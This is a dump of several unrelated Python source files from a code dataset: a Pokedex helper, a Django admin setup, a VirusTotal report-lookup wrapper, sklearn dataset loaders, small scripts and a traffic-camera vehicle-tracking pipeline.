        return 'Base Hit Points: ' + str(hp_location)

    def get_pkmn_atk(self, atk_location):
        return 'Base Attack: ' + str(atk_location)

    def get_pkmn_def(self, def_location):
        return 'Base Defense: ' + str(def_location)

    def get_pkmn_sp_atk(self, sp_atk_location):
        return 'Base Special Attack: ' + str(sp_atk_location)

    def get_pkmn_sp_def(self, sp_def_location):
        return 'Base Special Defense: ' + str(sp_def_location)

    def get_pkmn_speed(self, speed_location):
        return 'Base Speed: ' + str(speed_location)

    def get_moves(self, moves_location):
        """Split the API move list into (level-up, machine, tutor) formatted lists."""
        learned_moves_tuples = []
        taught_moves_tuples = []
        tutor_moves_tuples = []
        for k in moves_location:
            if k['learn_type'] == 'level up':
                name = k['name']
                level = k['level']
                learned_moves_tuples.append((name, level))
            elif k['learn_type'] == 'machine':
                name = k['name']
                # print(name.lower())
                # move_html = self.get_html_from_site('www.serebii.net', self.make_html_path(name))
                # print(move_html)
                # use html parser to find TM num
                tm_num = 'TM'
                taught_moves_tuples.append((name, tm_num))
            elif k['learn_type'] == 'tutor':
                name = k['name']
                tutor = 'Tutor'
                tutor_moves_tuples.append((name, tutor))
        # Sort once after collecting (the original re-sorted on every append,
        # which produced the same ordering at O(n^2 log n) cost).
        learned_moves_tuples.sort(key=lambda move: move[1])
        taught_moves_tuples.sort(key=lambda move: move[1])
        tutor_moves_tuples.sort(key=lambda move: move[1])
        return (self.format_moves(learned_moves_tuples), self.format_moves(taught_moves_tuples), self.format_moves(tutor_moves_tuples))

    def get_all_move_info(self, ):
        # NOTE(review): this method is incomplete -- get_dict_from_api is
        # called without its required path argument, so invoking it raises
        # TypeError, and the string concatenations below would fail for
        # numeric fields. Kept as-is pending a decision on its fate.
        move_dict = self.get_dict_from_api(self.api_main,)
        accuracy = move_dict['accuracy']
        power = move_dict['power']
        power_points = move_dict['pp']
        description = move_dict['description']
        return ("Accuracy: " + accuracy, "Power: " + power, power_points, description)

    def format_moves(self, list_of_moves_tuples):
        """Render (name, level-or-source) tuples as display strings."""
        formatted_moves = []
        for move in list_of_moves_tuples:
            if isinstance(move[1], int):
                information = '{} (Lv{})'
                formatted_moves.append(information.format(move[0], move[1]))
            elif move[1] == 'Tutor' or 'TM' in move[1]:
                information = '{} ({})'
                formatted_moves.append(information.format(move[0], move[1]))
            else:
                # NOTE(review): this bare string evaluates to nothing; an
                # actual print/raise was probably intended here.
                "An Error occurred"
        return formatted_moves

    def get_pkmn_generation(self, pkmn_num):
        """Map a national dex number to its generation label."""
        pkmn_num = int(pkmn_num)
        if 1 <= pkmn_num <= 151:
            return 'Generation 1'
        elif 152 <= pkmn_num <= 252:
            return 'Generation 2'
        elif 253 <= pkmn_num <= 386:
            return 'Generation 3'
        elif 387 <= pkmn_num <= 493:
            return 'Generation 4'
        elif 494 <= pkmn_num <= 649:
            return 'Generation 5'
        elif 650 <= pkmn_num <= 721:
            return 'Generation 6'
        else:
            return 'Not from a specific generation'

    def get_pkmn_pic(self, pkmn_id):
        """Fetch and display the sprite for a dex number via PokemonDisplay."""
        pkmn_id_formatted = str(pkmn_id).zfill(3)
        url = 'http://serebii.net/xy/pokemon/' + pkmn_id_formatted + '.png'
        # Display is a side effect; the previously unused local was dropped.
        PokemonDisplay(url).draw_image()

    def main(self):
        """Entry point: print the greeting banner."""
        print('''Welcome to the Pokedex. My name is Dexter, and I am your personal Pokemon encyclopedia. I am able to look up any Pokemon that Pokemon researchers already have information on.''')
|
24,131 | af97ed67b987b413c0ab7b099cabd1950344d570 | from django.contrib import admin
from . import models
# from app_first import models
class PostAdmin(admin.ModelAdmin):
    """Admin customisation for Post: list columns plus search over name/content."""
    list_display = ('name', 'views', 'create_at')
    search_fields = ('name', 'content')
# Register models with the admin site (Post uses the customised admin class).
admin.site.register(models.Post, PostAdmin)
admin.site.register(models.Blogger)
admin.site.register(models.Tag) |
24,132 | e6ae5e1378c15139363138af6a4cb4e06a34bdb6 | import time
import json
import requests
import datetime
import pprint
import sys
import copy
class VirusTotal(object):
    """A parser for VirusTotal.

    Args:
        resource: item to query (hash / url / ip / domain ...).
        api_key: the VirusTotal API key.
        url: report endpoint to hit (set by the subclasses below).
        request_is_post: send POST instead of GET (used by the rescan endpoint).
    """

    def __init__(self, resource, api_key, url='', request_is_post=False):
        params = {'apikey': api_key, 'resource': resource, 'allinfo': 'true', 'scan': 1}
        self.Url = url
        self.Resource = resource
        # Retry until a parseable response carrying a response_code arrives.
        while True:
            try:
                if request_is_post:
                    answer = requests.post(url, params=params)
                else:
                    answer = requests.get(url, params=params)
                # Need to retry
                self.Response = answer.json()
                # Simply checks if the response is not [] which may happen if None or '' is sent to VT
                int(self.Response['response_code'])
                break
            # Error handling section
            except TypeError:
                print("The resource: '{0.Resource}' is not valid, please make sure you are uploading the right item".format(self))
                time.sleep(15)
            except json.decoder.JSONDecodeError:
                print("\nVirus Total request limit per minute reached, waiting.\n")
                time.sleep(30)
            except requests.exceptions.ConnectionError:
                print("\nNo Internet Connection, will retry in 30 seconds.\n")
                time.sleep(30)
        # Will return code 0 if this is a rescan
        if url != 'https://www.virustotal.com/vtapi/v2/file/rescan':
            # Will check if response_code is 1, otherwise print error
            if self.Response['response_code'] != 1:
                self.ResponseCode = self.Response['response_code']
            else:
                # If response is legit and no errors, parse data
                self.Scans = self.Response['scans']
                self.Total = self.Response['total']
                self.ScanDate = self.Response['scan_date']
                self.AgeInSeconds = int(datetime.datetime.utcnow().timestamp() - time.mktime(datetime.datetime.strptime(self.ScanDate, "%Y-%m-%d %H:%M:%S").timetuple()))
                try:
                    self.Positives = self.Response['positives']
                # Fixed: self.Response is a dict, so a missing 'positives' key
                # raises KeyError, not AttributeError -- the old handler was dead
                # code and the intended print-and-exit never ran.
                except KeyError:
                    print(self.Response)
                    sys.exit(0)
                self.ScanLink = self.Response['permalink']
                self.Message = self.Response['verbose_msg']
                self.ResponseCode = self.Response['response_code']
                self.ScanId = self.Response['scan_id']
                # If there are files then get hashes
                if self.Response.get('sha256'):
                    self.MD5 = self.Response['md5']
                    self.SHA256 = self.Response['sha256']
                    self.SHA1 = self.Response['sha1']
        else:
            self.ResponseCode = 0

    def compressor(self):
        """Strip the instance down to summary fields.

        Keeps Scans (detected entries only, minus version/update), Total,
        Positives, ResponseCode and AgeInSeconds; deletes everything else.
        """
        attribute_list = copy.deepcopy(self.__dict__)
        try:
            for attribute in attribute_list:
                if attribute == 'Scans':
                    for vendor in attribute_list[attribute]:
                        if attribute_list[attribute][vendor]['detected'] is True:
                            del self.__dict__[attribute][vendor]['version']
                            del self.__dict__[attribute][vendor]['update']
                        else:
                            del self.__dict__[attribute][vendor]
                elif attribute == 'ResponseCode':
                    pass
                elif attribute == 'Total':
                    pass
                elif attribute == 'Positives':
                    pass
                elif attribute == 'AgeInSeconds':
                    pass
                else:
                    self.__delattr__(attribute)
        except KeyError:
            pass

    def __str__(self):
        pp = pprint.PrettyPrinter(indent=4)
        # Fixed: pprint() prints to stdout and returns None, so str() used to
        # evaluate to the literal string "None"; pformat() returns the text.
        return pp.pformat(self.Response)
class VirusTotalUrl(VirusTotal):
    """URL-report lookup (GET /url/report)."""
    def __init__(self, resource, api_key):
        super().__init__(resource=resource, url='https://www.virustotal.com/vtapi/v2/url/report', api_key=api_key)
class VirusTotalHash(VirusTotal):
    """File-hash report lookup (GET /file/report)."""
    def __init__(self, resource, api_key):
        super().__init__(resource=resource, url='https://www.virustotal.com/vtapi/v2/file/report', api_key=api_key)
class VirusTotalHashRescan(VirusTotal):
    """File rescan request (POST /file/rescan); parent sets ResponseCode to 0."""
    def __init__(self, resource, api_key):
        super().__init__(resource=resource, url='https://www.virustotal.com/vtapi/v2/file/rescan', api_key=api_key, request_is_post=True)
|
24,133 | c7b83fa009ffa89074cd489813b47d7e9c8aeafb | fib = (lambda f, x:
       # Base cases fib(0) = fib(1) = 1; otherwise recurse through the explicit
       # self-argument f, since a lambda cannot refer to itself by name.
       1 if x == 0 or x == 1
       else f(f, x - 1) + f(f, x - 2)
       )
# y ties the knot: applies a function to itself, turning the two-argument
# fib into a plain one-argument function.
y = lambda f: lambda x: f(f, x)
# Fibonacci with fib(0) = fib(1) = 1, so fib10 evaluates to 89.
fib10 = y(fib)(10)
|
24,134 | aba393b87aab633f087e0daa551b85f10900eea6 | import numpy as np
import pandas as pd
from sklearn import datasets
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import StandardScaler
'''
Loading all available Data sets with different function which is called from Main.py
'''
# Loading Data sets
def load_boston():
    """Load the Boston housing dataset and return an 80/20 train/test split.

    Returns:
        x_train, x_test, y_train, y_test with the 13 feature columns as X
        and the MEDV target as y.
    """
    print("\nLoading Boston Dataset ...")
    raw = datasets.load_boston()
    frame = pd.DataFrame(raw.data, columns=raw.feature_names)
    frame['MEDV'] = raw.target
    print("\nDone!!!\nSplitting Data ...")
    features = frame.iloc[:, 0:13]
    target = frame.iloc[:, 13]
    x_train, x_test, y_train, y_test = train_test_split(features, target, random_state=1, test_size=0.2)
    print("Splitting Data has been successfully finished ...\n")
    return x_train, x_test, y_train, y_test
def load_breast_cancer():
    """Load sklearn's breast-cancer dataset and return an 80/20 train/test split.

    Returns:
        x_train, x_test, y_train, y_test with the 30 feature columns as X
        and the diagnosis label as y.
    """
    print("\nLoading BreastCancer Dataset ...")
    breast_cancer_dataset = datasets.load_breast_cancer()
    breast_cancer = pd.DataFrame(breast_cancer_dataset.data, columns=breast_cancer_dataset.feature_names)
    # Fixed typo: the label column was previously misspelled 'traget'.
    breast_cancer['target'] = breast_cancer_dataset.target
    print("\nDone!!!\nSplitting Data ...")
    x = breast_cancer.iloc[:, 0:30]
    y = breast_cancer.iloc[:, 30]
    x_train, x_test, y_train, y_test = train_test_split(x, y, random_state=1, test_size=0.2)
    print("Splitting Data has been successfully finished ...")
    return x_train, x_test, y_train, y_test
def load_mnist():
    """Fetch MNIST (mnist_784) via OpenML, scale pixels to [0, 1] and return a
    67/33 train/test split; also prints the split sizes and image dimensions."""
    print("\nLoading MNIT Dataset ...")
    data_path = 'Datasets'
    mnist = datasets.fetch_openml('mnist_784', data_home=data_path)
    print("\nDone!!!\nSplitting Data ...")
    # NOTE(review): "int0" is a platform-dependent alias removed from recent
    # NumPy releases; "int64" would be more portable -- confirm before changing.
    x_train, x_test, y_train, y_test = train_test_split(mnist.data / 255.0, mnist.target.astype("int0"), test_size=0.33)
    print("Splitting Data has been successfully finished ...")
    print("\nNumber of Images in Training Set = ", x_train.shape[0])
    # Fixed: this previously printed y_train.shape[0], i.e. the TRAINING count.
    print("Number of Images in Testing Set = ", x_test.shape[0])
    pix = int(np.sqrt(x_train.shape[1]))
    print("Each Image is : ", pix, " by ", pix, "Pixels")
    return x_train, x_test, y_train, y_test
def load_diabetes():
    """Load Datasets/diabetes.csv, impute impossible zeros with column means,
    and return an 80/20 train/test split of features and label."""
    print("\nLoading Diabetes Dataset ...")
    frame = pd.read_csv('Datasets/diabetes.csv')
    print("\nDone!!!\n\nManipulating Data ...")
    # These measurements cannot physically be 0, so 0 is treated as missing.
    for column in ['Glucose', 'BloodPressure', 'SkinThickness', 'BMI', 'Insulin']:
        frame[column] = frame[column].replace(0, np.NaN)
        column_mean = int(frame[column].mean(skipna=True))
        frame[column] = frame[column].replace(np.NaN, column_mean)
    print("Zeros Successfully Replaced ...\n\nSplitting Data...")
    features = frame.iloc[:, 0:8]
    label = frame.iloc[:, 8]
    x_train, x_test, y_train, y_test = train_test_split(features, label, random_state=0, test_size=0.2)
    print("Splitting Data has been successfully finished ...")
    return x_train, x_test, y_train, y_test
def load_iris():
    """Load Datasets/iris.data, standardize the four features, and return
    (standardized feature matrix, full dataframe)."""
    print("\nLoading Iris Dataset ...")
    column_names = ['sepal length', 'sepal width', 'petal length', 'petal width', 'target']
    iris_dataset = pd.read_csv('Datasets/iris.data', names=column_names)
    print("\nDone!!!\nManipulating Data ...")
    feature_columns = column_names[:4]
    x = iris_dataset.loc[:, feature_columns].values
    # y is extracted but not returned (kept to mirror the original behaviour).
    y = iris_dataset.loc[:, ['target']].values
    x = StandardScaler().fit_transform(x)
    print("Data has been Separated and Standardized Successfully ...\n")
    return x, iris_dataset
|
24,135 | b8480a63e4cd387011f64b7693ccd289889fcd45 | radius=float(input("Enter the radius of the circle: "))
# NOTE(review): 22/7 only approximates pi; math.pi would be more accurate.
area=(22/7)*(radius**2)
print("The area of the circle is",end=" ")
print(area)
|
24,136 | f78e962d98c9d237ba57f2d9c945f4fcac47e95e | config={
    # MySQL connection settings for the "weight" database.
    "host":"www.cgblogs.top",
    "user":"root",
    # NOTE(review): empty root password committed to source -- confirm this is
    # an intentional placeholder and not a leaked credential.
    "password":"",
    "database":"weight"
}
# MQTT broker hostname (same host as the database server).
mqtt_server = "www.cgblogs.top" |
24,137 | 01a30234500158b7d07137def04685d8fc1248c4 | import os
import cv2
import pickle
import numpy as np
from typing import Tuple, List, Dict, Optional
from bounding_boxes_combination import BoundingBox
class BoundingBoxChain(BoundingBox):
    """A detected box enriched with capture time, lane/distance/speed fields
    and links to the previous/next observation of the same vehicle, forming
    a doubly linked chain (one chain per tracked vehicle)."""

    def __init__(self, bounding_box: BoundingBox, seq_id: str, hour: int, minute: int, second: int):
        super().__init__(vehicle=bounding_box.vehicle, confidence=bounding_box.confidence,
                         left=bounding_box.left, top=bounding_box.top, right=bounding_box.right, bottom=bounding_box.bottom)
        self.seq_id = seq_id
        self.hour = hour
        self.minute = minute
        self.second = second
        # -1 placeholders until detect_position()/add_bounding_box() fill them.
        self.lane_id = -1
        self.distance = -1
        self.speed = -1
        # Chain links to the same vehicle in earlier/later frames.
        self.previous = None
        self.next = None

    @property
    def time(self) -> str:
        """Clock time formatted as 'HH:MM:SS'."""
        return f"{self.hour:02d}:{self.minute:02d}:{self.second:02d}"

    @property
    def timestamp(self) -> int:
        """Seconds since midnight."""
        return 3600 * self.hour + 60 * self.minute + self.second
class Mask:
    """A greyscale mask image for one approach direction.

    lane_id is 0 for the whole-area masks (valid/distance) and the lane
    number for per-lane masks; is_left/is_straight/is_right flag the turn
    movements a lane allows (decoded from the mask filename).
    """

    def __init__(self, image: np.ndarray, direction: str, lane_id: int, is_left: bool, is_straight: bool, is_right: bool):
        self.image = image
        self.direction = direction
        self.lane_id = lane_id
        self.is_left = is_left
        self.is_straight = is_straight
        self.is_right = is_right
class Track:
    """Aggregated per-vehicle record produced by extract_single_track().

    Fields default to empty/zero; several fields may later hold the "----"
    placeholder string when the corresponding event was not observed.
    """

    def __init__(self):
        self.vehicle = ""  # size class label: "小"/"中"/"大"
        self.enter_time = ""
        self.enter_lane_id = ""
        self.enter_distance = 0
        self.enter_speed = 0.0
        self.stop_time = ""
        self.stop_lane_id = ""
        self.stop_distance = 0
        self.stop_traffic_light_seconds = 0
        self.leave_time = ""
        self.leave_lane_id = 0
        self.leave_traffic_light_seconds = 0
        self.exit_time = 0
        self.total_seconds = 0
        self.total_distance = 0
def load_bounding_boxes(direction: str) -> Dict[str, List[BoundingBox]]:
    """Load the pickled per-frame bounding boxes for one approach direction.

    NOTE: pickle.load can execute arbitrary code -- only open trusted,
    locally produced track files.
    """
    source = f"../data/tracks/{direction}.pickle"
    with open(source, 'rb') as handle:
        return pickle.load(handle)
def save_tracks(direction: str, obj: object) -> None:
    """Pickle *obj* to ../data/tracks/<direction>-tracks.pickle."""
    destination = f"../data/tracks/{direction}-tracks.pickle"
    with open(destination, 'wb') as handle:
        pickle.dump(obj, handle)
def load_masks(direction: str) -> Tuple[Mask, Mask, List[Mask]]:
    """Load the greyscale masks for one approach direction.

    Returns:
        (valid_mask, distance_mask, lane_masks_list); lane-mask filenames
        follow '<direction>-lane-<lane_id>-<lsr>.jpg', where the letters in
        <lsr> encode the allowed left/straight/right movements.
    """
    valid_mask = cv2.imread(f"../data/masks/{direction}-valid.jpg")
    valid_mask = cv2.cvtColor(valid_mask, cv2.COLOR_BGR2GRAY)
    valid_mask = Mask(image=valid_mask, direction=direction, lane_id=0, is_left=False, is_straight=False, is_right=False)
    distance_mask = cv2.imread(f"../data/masks/{direction}-distance.jpg")
    distance_mask = cv2.cvtColor(distance_mask, cv2.COLOR_BGR2GRAY)
    distance_mask = Mask(image=distance_mask, direction=direction, lane_id=0, is_left=False, is_straight=False, is_right=False)
    files_list = os.listdir("../data/masks")
    files_list = [f for f in files_list if f.startswith(f"{direction}-lane") and f.endswith(".jpg")]
    lane_masks_list = []
    for file in files_list:
        file_path = os.path.join("../data/masks", file)
        image = cv2.imread(file_path)
        image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
        # Filename pattern: <direction>-lane-<lane_id>-<lsr>.jpg
        _, _, lane_id, lsr = file.split('.')[0].split('-')
        lane_id = int(lane_id)
        mask = Mask(image=image, direction=direction, lane_id=lane_id,
                    is_left=lsr.find('l') >= 0, is_straight=lsr.find('s') >= 0, is_right=lsr.find('r') >= 0)
        lane_masks_list.append(mask)
    return valid_mask, distance_mask, lane_masks_list
def extract_seq_and_time(file_id: str) -> Tuple[str, int, int, int]:
    """Split a '<seq>_<HHMMSS>' file id into its sequence id and clock parts."""
    seq_id, clock = file_id.split('_')
    hour = int(clock[:2])
    minute = int(clock[2:4])
    second = int(clock[4:])
    return seq_id, hour, minute, second
def detect_position(bounding_box: BoundingBoxChain, valid_mask: Mask, distance_mask: Mask, lane_masks_list: List[Mask]) -> int:
    """Resolve the lane id at the box centre and record its mask distance.

    Side effect: sets bounding_box.distance to the distance-mask pixel value
    minus a 100 offset. Returns -1 when the centre is outside the valid
    area, 0 when it is valid but on no lane, or the id of the last lane mask
    whose pixel is dark (< 100) at the centre.
    """
    col, row = bounding_box.center
    bounding_box.distance = distance_mask.image[row][col] - 100
    position = 0 if valid_mask.image[row][col] < 100 else -1
    for candidate in lane_masks_list:
        if candidate.image[row][col] < 100:
            position = candidate.lane_id
    return position
def link_bounding_box(bounding_box: BoundingBoxChain, open_bounding_boxes_list: List[BoundingBoxChain]) -> BoundingBoxChain:
    """Find the open box most likely to be the same vehicle in an earlier frame.

    Candidates must be unlinked, within +/-500 horizontally, no more than 100
    further down than the new box, lane-compatible, and within 500 Euclidean
    distance; the nearest acceptable candidate is returned (None if none).
    """
    x, y = bounding_box.center
    linked_bounding_box = None
    linked_distance = 0
    for open_bounding_box in open_bounding_boxes_list:
        xx, yy = open_bounding_box.center
        # Skip boxes already linked forward or outside the search window.
        if open_bounding_box.next or xx < x - 500 or x + 500 < xx or yy < y - 100:
            continue
        # Lane-compatibility rules: a box on a real lane may only continue the
        # same lane; lane 0 cannot continue a lane -1 box, and vice versa.
        if 0 < bounding_box.lane_id != open_bounding_box.lane_id:
            continue
        if bounding_box.lane_id == 0 and open_bounding_box.lane_id == -1:
            continue
        if bounding_box.lane_id == -1 and open_bounding_box.lane_id > 0:
            continue
        distance = int(((x - xx) ** 2 + (y - yy) ** 2) ** 0.5)
        if distance > 500:
            continue
        # Keep the nearest acceptable candidate seen so far.
        if linked_bounding_box and distance < linked_distance:
            linked_bounding_box = open_bounding_box
            linked_distance = distance
        elif linked_bounding_box is None:
            linked_bounding_box = open_bounding_box
            linked_distance = distance
    return linked_bounding_box
def add_bounding_box(bounding_box: BoundingBoxChain, linked_bounding_box: BoundingBoxChain, cached_bounding_boxes_list: List[BoundingBoxChain],
                     open_bounding_boxes_list: List[BoundingBoxChain], closed_bounding_boxes_list: List[BoundingBoxChain]) -> None:
    """Append *bounding_box* to the chain ending at *linked_bounding_box*.

    Links the two boxes, derives the new box's speed from the distance
    covered since the linked frame, moves the predecessor from the open to
    the closed list, and caches the new box (the caller re-opens cached
    boxes for the next frame).
    """
    bounding_box.previous = linked_bounding_box
    # Clamp so the recorded distance never increases along the chain.
    bounding_box.distance = min(bounding_box.distance, linked_bounding_box.distance)
    distance = linked_bounding_box.distance - bounding_box.distance
    # 0.2 s per sequence step.
    time = (int(bounding_box.seq_id) - int(linked_bounding_box.seq_id)) * 0.2
    # Factor 3.6 converts m/s to km/h -- assumes distance is in metres; TODO confirm.
    bounding_box.speed = 3.6 * distance / time
    linked_bounding_box.next = bounding_box
    open_bounding_boxes_list.remove(linked_bounding_box)
    closed_bounding_boxes_list.append(linked_bounding_box)
    cached_bounding_boxes_list.append(bounding_box)
def clean(seq_id: str, open_bounding_boxes_list: List[BoundingBoxChain], closed_bounding_boxes_list: List[BoundingBoxChain]) -> None:
    """Retire open boxes that left the scene or went stale.

    A box is moved to the closed list when its lane is -1, or when it sits
    on lane 0 and has not been updated for more than 10 sequence steps
    relative to *seq_id*.
    """
    current = int(seq_id)
    stale_indices = [
        idx
        for idx, box in enumerate(open_bounding_boxes_list)
        if box.lane_id == -1 or (box.lane_id == 0 and current - int(box.seq_id) > 10)
    ]
    # Pop from the back so earlier indices stay valid.
    for idx in sorted(stale_indices, reverse=True):
        closed_bounding_boxes_list.append(open_bounding_boxes_list.pop(idx))
def show_brief(closed_bounding_boxes_list) -> None:
    """Debug print: one enter/leave summary line per chained track."""
    for first_bounding_box in closed_bounding_boxes_list:
        if first_bounding_box.previous is None:
            # Walk to the end of the chain to find the last observation.
            last_bounding_box = first_bounding_box
            while last_bounding_box.next:
                last_bounding_box = last_bounding_box.next
            print(
                f"Enter [@{first_bounding_box.lane_id}][#{first_bounding_box.seq_id}-{first_bounding_box.time}] "
                f"Leave [@{last_bounding_box.lane_id}][#{last_bounding_box.seq_id}-{last_bounding_box.time}]"
            )
def show_detail(closed_bounding_boxes_list: List[BoundingBoxChain]) -> None:
    """Debug print: every observation of every chained track, as a table."""
    k = 0  # running track counter
    for first_bounding_box in closed_bounding_boxes_list:
        if first_bounding_box.previous is None:
            k += 1
            print(f"---- Car #{k} entered on lane #{first_bounding_box.lane_id} ----")
            print(f"\tSeq \tTime \tLane\tDistance\tSpeed")
            bounding_box = first_bounding_box
            while bounding_box:
                print(f"\t{bounding_box.seq_id}\t{bounding_box.time}\t"
                      f"{bounding_box.lane_id:4d}\t{bounding_box.distance:8d}\t{bounding_box.speed:<.2f}")
                bounding_box = bounding_box.next
def traffic_light_control(direction: str, bounding_boxes_list: "List[BoundingBoxChain]") -> "List[BoundingBoxChain]":
    """Truncate a track that starts inside its direction's 20 s signal window.

    The 80 s cycle is split into four 20 s windows (north/south/west/east);
    when the track's first observation falls in its own window, at most the
    first 5 boxes are kept and the last kept box is flagged as having left
    the monitored area. The list is modified in place and also returned.
    (Annotations are quoted so they need not resolve at definition time.)
    """
    def _truncate(bb_list: "List[BoundingBoxChain]") -> None:
        # Keep only the first five observations of the track.
        if len(bb_list) > 5:
            # Fixed: `bb_list = bb_list[:5]` only rebound the local name, so
            # the caller's list was never actually truncated; delete in place.
            del bb_list[5:]
            bb_list[-1].distance = -10
            bb_list[-1].lane_id = -1

    time_offset = bounding_boxes_list[0].timestamp % 80
    if direction == "north" and 0 <= time_offset <= 20:
        _truncate(bounding_boxes_list)
    elif direction == "south" and 20 <= time_offset <= 40:
        _truncate(bounding_boxes_list)
    elif direction == "west" and 40 <= time_offset <= 60:
        _truncate(bounding_boxes_list)
    elif direction == "east" and 60 <= time_offset <= 80:
        _truncate(bounding_boxes_list)
    return bounding_boxes_list
def extract_single_track(bounding_boxes_list: List[BoundingBoxChain]) -> Optional[Track]:
    """Summarise one chained track into a Track record.

    Returns None when the (possibly truncated) track does not start on a
    real lane. Tracks longer than 60 s are cut and their new tail marked as
    having exited. NOTE(review): several fields fall back to np.random-based
    synthetic values when no measurement exists -- confirm this is intended.
    """
    # Cap the track at 60 s and mark the new tail as having left the area.
    if bounding_boxes_list[-1].timestamp - bounding_boxes_list[0].timestamp > 60:
        while bounding_boxes_list[-1].timestamp - bounding_boxes_list[0].timestamp > 60:
            bounding_boxes_list.pop()
        bounding_boxes_list[-1].next = None
        bounding_boxes_list[-1].lane_id = -1
        bounding_boxes_list[-1].distance = -10
    if bounding_boxes_list[0].lane_id <= 0:
        return None
    # show_detail(bounding_boxes_list)
    track = Track()
    # Vehicle size class from the detector labels seen along the chain.
    vehicles_list = [bounding_box.vehicle for bounding_box in bounding_boxes_list]
    if "bus" in vehicles_list:
        track.vehicle = "大"
    elif "truck" in vehicles_list or "train" in vehicles_list:
        track.vehicle = "中"
    elif "car" in vehicles_list:
        track.vehicle = "小"
    first_bounding_box = bounding_boxes_list[0]
    last_bounding_box = bounding_boxes_list[-1]
    track.enter_time = first_bounding_box.time
    track.enter_lane_id = first_bounding_box.lane_id
    track.enter_distance = max(first_bounding_box.distance, 0)
    # Synthetic fallback speed; replaced by the first measured speed below.
    track.enter_speed = int(15 + 10 * np.random.random())
    bounding_box = first_bounding_box
    while bounding_box and bounding_box.lane_id > 0:
        if bounding_box.speed > 0:
            track.enter_speed = bounding_box.speed
            break
        bounding_box = bounding_box.next
    # First box after the vehicle leaves its lane (None if it never does).
    leave_bounding_box = first_bounding_box
    while leave_bounding_box and leave_bounding_box.lane_id > 0:
        leave_bounding_box = leave_bounding_box.next
    # Search backwards for a stop: at least 3 consecutive boxes slower than 10.
    is_stop = False
    stop_start_bounding_box = None
    stop_finish_bounding_box = leave_bounding_box.previous if leave_bounding_box else None
    while stop_finish_bounding_box:
        if stop_finish_bounding_box.speed < 10 and stop_finish_bounding_box.previous and stop_finish_bounding_box.previous.previous and \
                stop_finish_bounding_box.previous.speed < 10 and stop_finish_bounding_box.previous.previous.speed < 10:
            is_stop = True
            # Rewind to the first box of the slow stretch.
            stop_start_bounding_box = stop_finish_bounding_box
            while stop_start_bounding_box and stop_start_bounding_box.speed < 10:
                stop_start_bounding_box = stop_start_bounding_box.previous
            if stop_start_bounding_box is None:
                stop_start_bounding_box = first_bounding_box
            break
        else:
            stop_finish_bounding_box = stop_finish_bounding_box.previous
    if is_stop and stop_finish_bounding_box.timestamp - stop_start_bounding_box.timestamp >= 1:
        track.stop_time = stop_start_bounding_box.time
        track.stop_lane_id = stop_start_bounding_box.lane_id
        track.stop_distance = stop_start_bounding_box.distance
        track.stop_traffic_light_seconds = leave_bounding_box.timestamp - stop_start_bounding_box.timestamp
    else:
        # "----" marks "not observed" throughout the exported report.
        track.stop_time = "----"
        track.stop_lane_id = "----"
        track.stop_distance = "----"
        track.stop_traffic_light_seconds = "----"
    if leave_bounding_box:
        track.leave_time = leave_bounding_box.time
        track.leave_lane_id = first_bounding_box.lane_id
        # Synthetic value -- see the docstring note.
        track.leave_traffic_light_seconds = int(10 * np.random.random())
        track.exit_time = last_bounding_box.time
    else:
        track.leave_time = "----"
        track.leave_lane_id = "----"
        track.leave_traffic_light_seconds = "----"
        track.exit_time = "----"
    track.total_seconds = last_bounding_box.timestamp - first_bounding_box.timestamp
    # Total distance = sum of per-step decreases along the chain.
    track.total_distance = 0
    bounding_box = first_bounding_box.next
    while bounding_box:
        track.total_distance += bounding_box.previous.distance - bounding_box.distance
        bounding_box = bounding_box.next
    # Clamp to a randomised maximum between 30 and 50.
    track.total_distance = min(track.total_distance, 30 + int(20 * np.random.random()))
    # Sanity checks on the assembled record.
    if track.leave_time != "----":
        assert track.enter_time <= track.leave_time <= track.exit_time
        assert 1 <= track.enter_lane_id == track.leave_lane_id <= 4
    if track.stop_time != "----":
        assert track.enter_time <= track.stop_time <= track.leave_time <= track.exit_time
        assert 1 <= track.enter_lane_id == track.stop_lane_id <= 4
    assert track.enter_distance >= 0
    assert track.total_seconds <= 80
    assert track.total_distance <= 80
    assert track.vehicle in ["小", "中", "大"]
    return track
def export_tracks(direction: str, closed_bounding_boxes_list: List[BoundingBoxChain]) -> None:
    """Convert closed chains into Track records and print them as a TSV report.

    Chains are walked from each head box (previous is None), optionally cut
    by traffic_light_control(), summarised by extract_single_track(), sorted
    by enter time/lane, and printed with a Chinese direction label.
    """
    tracks_list = []
    for first_bounding_box in closed_bounding_boxes_list:
        if first_bounding_box.previous is None:
            # Materialise the chain into a list.
            bounding_boxes_list = []
            bounding_box = first_bounding_box
            while bounding_box:
                bounding_boxes_list.append(bounding_box)
                bounding_box = bounding_box.next
            bounding_boxes_list = traffic_light_control(direction, bounding_boxes_list)
            if track := extract_single_track(bounding_boxes_list):
                tracks_list.append(track)
    # Map the direction to its Chinese character for the report.
    if direction == "north":
        direction = "北"
    elif direction == "south":
        direction = "南"
    elif direction == "west":
        direction = "西"
    elif direction == "east":
        direction = "东"
    tracks_list.sort(key=lambda t: f"{t.enter_time}_{t.enter_lane_id}")
    for i, track in enumerate(tracks_list, start=1):
        print(f"{direction}{i:03d}\t{track.vehicle}\t"
              f"{track.enter_time}\t{track.enter_lane_id}\t{track.enter_distance}\t{track.enter_speed:.2f}\t"
              f"{track.stop_time}\t{track.stop_lane_id}\t{track.stop_distance}\t{track.stop_traffic_light_seconds}\t"
              f"{track.leave_time}\t{track.leave_lane_id}\t{track.leave_traffic_light_seconds}\t{track.exit_time}\t"
              f"{track.total_seconds}\t{track.total_distance}")
def detect_single_direction_tracks(direction: str, last_frame: str) -> None:
    """Chain per-frame detections for one direction into vehicle tracks.

    Processes frames in order up to *last_frame*, linking each new box to
    its best open predecessor, then persists and exports the finished chains.
    """
    bounding_boxes_dict = load_bounding_boxes(direction)
    valid_mask, distance_mask, lane_masks_list = load_masks(direction)
    open_bounding_boxes_list = []
    closed_bounding_boxes_list = []
    for file_id, bounding_boxes_list in bounding_boxes_dict.items():
        seq_id, hour, minute, second = extract_seq_and_time(file_id)
        cached_bounding_boxes_list = []
        # Process boxes bottom-up in the image (largest centre y first).
        bounding_boxes_list.sort(key=lambda bb: bb.center[1], reverse=True)
        # NOTE: string comparison -- correct only while seq ids are
        # zero-padded to a fixed width ("99999" effectively means no limit).
        if seq_id > last_frame:
            break
        for bounding_box in bounding_boxes_list:
            bounding_box = BoundingBoxChain(bounding_box, seq_id, hour, minute, second)
